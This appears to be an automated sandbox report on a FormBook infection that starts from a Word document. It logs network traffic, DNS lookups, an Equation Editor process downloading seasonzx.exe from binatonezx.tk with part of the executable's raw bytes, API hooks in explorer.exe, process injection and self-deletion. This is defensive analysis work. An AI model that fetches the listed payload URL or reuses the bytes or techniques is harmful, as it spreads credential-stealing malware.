                                              Oct 27, 2021 16:42:18.314662933 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.314706087 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.314716101 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.314747095 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.314769983 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.314811945 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.314822912 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.314857960 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.314877033 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.314920902 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.314941883 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.314975977 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.314991951 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.315016031 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.315049887 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.315085888 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.315102100 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.315133095 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.315152884 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.315192938 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.315202951 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.315237045 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.315254927 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.315290928 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.315305948 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.315330982 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.315355062 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.315388918 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.315406084 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.315435886 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.315457106 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.315499067 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.315510035 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.315537930 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.315560102 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.315593958 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.315610886 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.315646887 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.315679073 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.315689087 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.315716982 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.315774918 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.330625057 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.330676079 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.330724001 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.330737114 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.330751896 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.330770969 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.330807924 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.330856085 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.330888987 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.330900908 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.330945015 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.330986977 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.331005096 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.331027031 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.331062078 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.331109047 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.331120014 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.331151009 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.342921019 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.342977047 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.342998981 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.343063116 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.343075037 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.343106985 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.343133926 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.343170881 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.343187094 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.343215942 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:19.291462898 CEST4916580192.168.2.222.56.59.211

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Oct 27, 2021 16:42:17.869247913 CEST5216753192.168.2.228.8.8.8
                                              Oct 27, 2021 16:42:17.888603926 CEST53521678.8.8.8192.168.2.22
                                              Oct 27, 2021 16:44:14.257828951 CEST5059153192.168.2.228.8.8.8
                                              Oct 27, 2021 16:44:14.508419037 CEST53505918.8.8.8192.168.2.22

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              Oct 27, 2021 16:42:17.869247913 CEST192.168.2.228.8.8.80x567bStandard query (0)binatonezx.tkA (IP address)IN (0x0001)
                                              Oct 27, 2021 16:44:14.257828951 CEST192.168.2.228.8.8.80xc18cStandard query (0)www.lenovoidc.comA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              Oct 27, 2021 16:42:17.888603926 CEST8.8.8.8192.168.2.220x567bNo error (0)binatonezx.tk2.56.59.211A (IP address)IN (0x0001)
                                              Oct 27, 2021 16:44:14.508419037 CEST8.8.8.8192.168.2.220xc18cName error (3)www.lenovoidc.comnonenoneA (IP address)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • binatonezx.tk

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.22491652.56.59.21180C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              TimestampkBytes transferredDirectionData
                                              Oct 27, 2021 16:42:17.944622040 CEST0OUTGET /seasonzx.exe HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: binatonezx.tk
                                              Connection: Keep-Alive
                                              Oct 27, 2021 16:42:17.983454943 CEST2INHTTP/1.1 200 OK
                                              Date: Wed, 27 Oct 2021 14:42:17 GMT
                                              Server: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fips
                                              Last-Modified: Wed, 27 Oct 2021 07:19:00 GMT
                                              ETag: "80800-5cf50687391d8"
                                              Accept-Ranges: bytes
                                              Content-Length: 526336
                                              Vary: User-Agent
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: application/x-msdownload
                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f3 a4 78 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 fe 07 00 00 08 00 00 00 00 00 00 3e 1d 08 00 00 20 00 00 00 20 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec 1c 08 00 4f 00 00 00 00 20 08 00 e0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 fd 07 00 00 20 00 00 00 fe 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e0 05 00 00 00 20 08 00 00 06 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 08 00 00 02 00 00 00 06 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 1d 08 00 00 00 00 00 48 00 00 00 02 00 05 00 10 be 00 00 c4 be 00 00 03 00 00 00 74 01 00 06 d4 7c 01 00 18 a0 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 26 02 28 17 00 00 0a 00 00 2a 00 00 1b 30 02 00 48 00 00 00 01 00 00 11 14 80 01 00 00 04 73 18 00 00 0a 80 02 00 00 04 00 7e 02 00 00 04 0a 16 0b 06 12 01 28 19 00 00 0a 00 00 7e 01 00 00 04 14 fe 01 0c 08 2c 0a 73 01 00 00 06 80 01 00 00 04 00 de 0b 07 2c 07 06 28 1a 00 00 0a 00 dc 2a 01 10 00 00 02 00 19 00 23 3c 00 0b 00 00 00 00 13 30 01 00 07 00 00 00 02 00 00 11 00 16 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 03 00 00 11 00 73 0b 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 04 00 00 11 00 73 52 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 05 00 00 11 00 73 54 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 06 00 00 11 00 73 a1 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 07 00 00 11 00 73 cf 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 08 00 00 11 00 73 da 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 09 00 00 11 00 73 80 00 00 06 0a 2b 00 06 2a 8a 02 16 7d 0a 00 00 04 02 17 7d 0b 00 00 04 02 28 1b 00 00 0a 00 00 02 72 01 00 00 70 7d 05 00 00 04 2a 7a 02 16 7d 0a 00 00 04 02 17 7d 0b 00 00 04 02 28 1b 00 00 0a 00 00 02 03 7d 05 00 00 04 2a 96 02 16 7d 0a 00 00 04 02 17 7d 0b 00 00 04 02 28 1b 00 00 0a 00 00 02 03 7d 05 00 00 04 02 04 7d 03 00 00 04 2a b2 02
                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELxa0> @ `@O @ H.textD `.rsrc @@.reloc@@B Ht|&(*0Hs~(~,s,(*#<0+*0s+*0sR+*0sT+*0s+*0s+*0s+*0s+*}}(rp}*z}}(}*}}(}}*
                                              Oct 27, 2021 16:42:17.983525991 CEST3INData Raw: 16 7d 0a 00 00 04 02 17 7d 0b 00 00 04 02 28 1b 00 00 0a 00 00 02 03 7d 05 00 00 04 02 04 7d 03 00 00 04 02 05 7d 04 00 00 04 2a 13 30 01 00 0c 00 00 00 0a 00 00 11 00 02 7b 05 00 00 04 0a 2b 00 06 2a 42 00 02 03 7d 05 00 00 04 02 16 7d 0a 00 00
                                              Data Ascii: }}(}}}*0{+*B}}*0{+*&}*0{+*&}*0{+*:t}*0{+*&}*0$
                                              Oct 27, 2021 16:42:17.983601093 CEST4INData Raw: 77 00 00 01 28 2f 00 00 0a 13 07 00 38 28 01 00 00 11 06 d0 78 00 00 01 28 27 00 00 0a 6f 28 00 00 0a 13 1d 11 1d 2c 1d 00 03 09 11 05 6f 22 00 00 0a a5 78 00 00 01 6c 28 2f 00 00 0a 13 07 00 38 f4 00 00 00 11 06 d0 79 00 00 01 28 27 00 00 0a 6f
                                              Data Ascii: w(/8(x('o(,o"xl(/8y('o(,o"yn(08z('o(,o"z(08('o( ,(o"to"ti(1+NA(
                                              Oct 27, 2021 16:42:17.983633041 CEST6INData Raw: 00 04 14 fe 03 0a 06 2c 18 02 7b 0f 00 00 04 02 fe 06 51 00 00 06 73 1d 01 00 06 6f a0 00 00 06 00 02 03 75 07 00 00 02 7d 0f 00 00 04 02 7b 0f 00 00 04 14 fe 03 0b 07 2c 18 02 7b 0f 00 00 04 02 fe 06 51 00 00 06 73 1d 01 00 06 6f 9f 00 00 06 00
                                              Data Ascii: ,{Qsou}{,{Qso*0{+*0!{,rpsFz}*0{+*0!{,rpsFz}*0'{
                                              Oct 27, 2021 16:42:17.983678102 CEST7INData Raw: 02 03 7d 0e 00 00 04 2a 00 01 10 00 00 02 00 19 00 a8 c1 00 15 00 00 00 00 1b 30 05 00 7f 01 00 00 23 00 00 11 00 02 28 3a 00 00 06 7e 48 00 00 0a 28 58 00 00 0a 13 05 11 05 2c 08 14 13 06 38 5d 01 00 00 02 02 7c 10 00 00 04 28 4a 00 00 06 00 72
                                              Data Ascii: }*0#(:~H(X,8]|(Jrrp(:(Is\s\{oSoT8oUt((L,8,rpo]&rpo]&,{o(No
                                              Oct 27, 2021 16:42:17.983725071 CEST9INData Raw: 04 00 70 6f 5d 00 00 0a 26 14 13 0a 03 13 0d 11 0d 2c 1e 00 02 7b 11 00 00 04 6f 19 00 00 06 02 11 09 28 4e 00 00 06 6f 05 01 00 06 13 0a 00 2b 21 00 02 7b 11 00 00 04 6f 19 00 00 06 02 09 25 17 58 0d 11 09 28 4f 00 00 06 6f 05 01 00 06 13 0a 00
                                              Data Ascii: po]&,{o(No+!{o%X(Oo o^rpo_(Po`(eo]&oZ:8u+,o[{oSoT8oUt(rpoWo,8(K
                                              Oct 27, 2021 16:42:17.983750105 CEST10INData Raw: 80 00 00 00 03 72 4e 08 00 70 6f 56 00 00 0a 2d 12 03 72 4e 08 00 70 6f 57 00 00 0a a5 6f 00 00 01 2b 01 16 0d 09 2c 04 16 0b 2b 58 03 72 e6 04 00 70 6f 56 00 00 0a 2d 12 03 72 e6 04 00 70 6f 57 00 00 0a a5 6f 00 00 01 2b 01 16 13 04 11 04 2c 04
                                              Data Ascii: rNpoV-rNpoWo+,+XrpoV-rpoWo+,+.rhpoV-rhpoWo+,++*0P'r:poWtkr0p(Ir~poW-rpoWrs+*0U'r
                                              Oct 27, 2021 16:42:17.983773947 CEST11INData Raw: 73 46 00 00 0a 7a 11 05 16 9a 28 2c 00 00 0a 6f 7a 00 00 0a 6f 40 00 00 0a 13 06 11 05 17 9a 6f 40 00 00 0a 13 07 11 05 17 9a 28 2c 00 00 0a 6f 7a 00 00 0a 6f 40 00 00 0a 13 08 11 06 13 0c 11 0c 13 0b 11 0b 28 7e 01 00 06 13 0d 11 0d 20 97 ae 71
                                              Data Ascii: sFz(,ozo@o@(,ozo@(~ qF5* _K6;+ S7.g+ qF;8Q 5 ;+ .s8, pq.+ n..8rFp(X:8r^p(X-s8rfp(X:
                                              Oct 27, 2021 16:42:17.983812094 CEST13INData Raw: 6f 62 00 00 0a 00 11 09 6f 86 00 00 0a 26 00 00 02 17 7d 1f 00 00 04 2a 00 13 30 03 00 0e 00 00 00 31 00 00 11 00 02 03 14 6f 8c 00 00 0a 0a 2b 00 06 2a 00 00 1b 30 03 00 da 03 00 00 32 00 00 11 00 02 6f 4f 00 00 0a 17 fe 01 16 fe 01 0c 08 2c 0b
                                              Data Ascii: obo&}*01o+*02oO,r psFz,i(roSoT+\oUt(r|poWo2(,+rpoWr,rpsKzoZ-u+
                                              Oct 27, 2021 16:42:17.983933926 CEST14INData Raw: 16 8c 72 00 00 01 a2 17 6f 93 00 00 0a 26 06 19 8d 11 00 00 01 25 16 72 90 0f 00 70 a2 25 17 16 8c 72 00 00 01 a2 25 18 16 8c 72 00 00 01 a2 17 6f 93 00 00 0a 26 06 19 8d 11 00 00 01 25 16 72 ac 0f 00 70 a2 25 17 17 8c 72 00 00 01 a2 25 18 17 8c
                                              Data Ascii: ro&%rp%r%ro&%rp%r%ro&%rp%r%ro&%rp%r%ro&%rp%r%ro&%rp%r%r
                                              Oct 27, 2021 16:42:18.010915041 CEST16INData Raw: 17 0b 07 2c 0c 00 72 13 16 00 70 73 4b 00 00 0a 7a 02 03 16 9a 28 7a 00 00 06 00 02 28 66 00 00 0a 74 03 00 00 02 0a 06 72 ae 16 00 70 03 16 9a 28 49 00 00 0a 6f 62 00 00 0a 00 02 06 03 28 7f 00 00 06 0c 2b 00 08 2a 00 13 30 02 00 1c 00 00 00 02
                                              Data Ascii: ,rpsKz(z(ftrp(Iob(+*0rpo,rpsKz*075r@psorpo~od(+*0m4sorUpk('o&orpk


                                              Code Manipulations

                                              User Modules

                                              Hook Summary

                                              Function NameHook TypeActive in Processes
                                              PeekMessageAINLINEexplorer.exe
                                              PeekMessageWINLINEexplorer.exe
                                              GetMessageWINLINEexplorer.exe
                                              GetMessageAINLINEexplorer.exe

                                              Processes

                                              Process: explorer.exe, Module: USER32.dll
                                              Function NameHook TypeNew Data
                                              PeekMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xEB
                                              PeekMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xEB
                                              GetMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xEB
                                              GetMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xEB

                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              Analysis Process: WINWORD.EXE PID: 940 Parent PID: 596

                                              General

                                              Start time:16:42:17
                                              Start date:27/10/2021
                                              Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                              Imagebase:0x13f600000
                                              File size:1423704 bytes
                                              MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Chronological Activities

                                              Analysis Process: EQNEDT32.EXE PID: 1532 Parent PID: 596

                                              General

                                              Start time:16:42:19
                                              Start date:27/10/2021
                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                              Imagebase:0x400000
                                              File size:543304 bytes
                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Chronological Activities

                                              Analysis Process: seasonhd72463.exe PID: 1812 Parent PID: 1532

                                              General

                                              Start time:16:42:21
                                              Start date:27/10/2021
                                              Path:C:\Users\user\AppData\Roaming\seasonhd72463.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\seasonhd72463.exe
                                              Imagebase:0x1100000
                                              File size:526336 bytes
                                              MD5 hash:9227463FFB6E37D271919E06D175EDA7
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.424515254.0000000002591000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Antivirus matches:
                                              • Detection: 23%, ReversingLabs
                                              Reputation:low

                                              Chronological Activities

                                              Analysis Process: seasonhd72463.exe PID: 2820 Parent PID: 1812

                                              General

                                              Start time:16:42:25
                                              Start date:27/10/2021
                                              Path:C:\Users\user\AppData\Roaming\seasonhd72463.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\seasonhd72463.exe
                                              Imagebase:0x1100000
                                              File size:526336 bytes
                                              MD5 hash:9227463FFB6E37D271919E06D175EDA7
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              Chronological Activities

                                              Analysis Process: explorer.exe PID: 1764 Parent PID: 2820

                                              General

                                              Start time:16:42:27
                                              Start date:27/10/2021
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Explorer.EXE
                                              Imagebase:0xffa10000
                                              File size:3229696 bytes
                                              MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:high

                                              Chronological Activities

                                              Analysis Process: msiexec.exe PID: 2004 Parent PID: 1764

                                              General

                                              Start time:16:42:41
                                              Start date:27/10/2021
                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\msiexec.exe
                                              Imagebase:0xb50000
                                              File size:73216 bytes
                                              MD5 hash:4315D6ECAE85024A0567DF2CB253B7B0
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:moderate

                                              Chronological Activities

                                              Analysis Process: cmd.exe PID: 2176 Parent PID: 2004

                                              General

                                              Start time:16:42:45
                                              Start date:27/10/2021
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:/c del 'C:\Users\user\AppData\Roaming\seasonhd72463.exe'
                                              Imagebase:0x4a880000
                                              File size:302592 bytes
                                              MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Chronological Activities

                                              Disassembly

                                              Code Analysis

                                              Reset < >

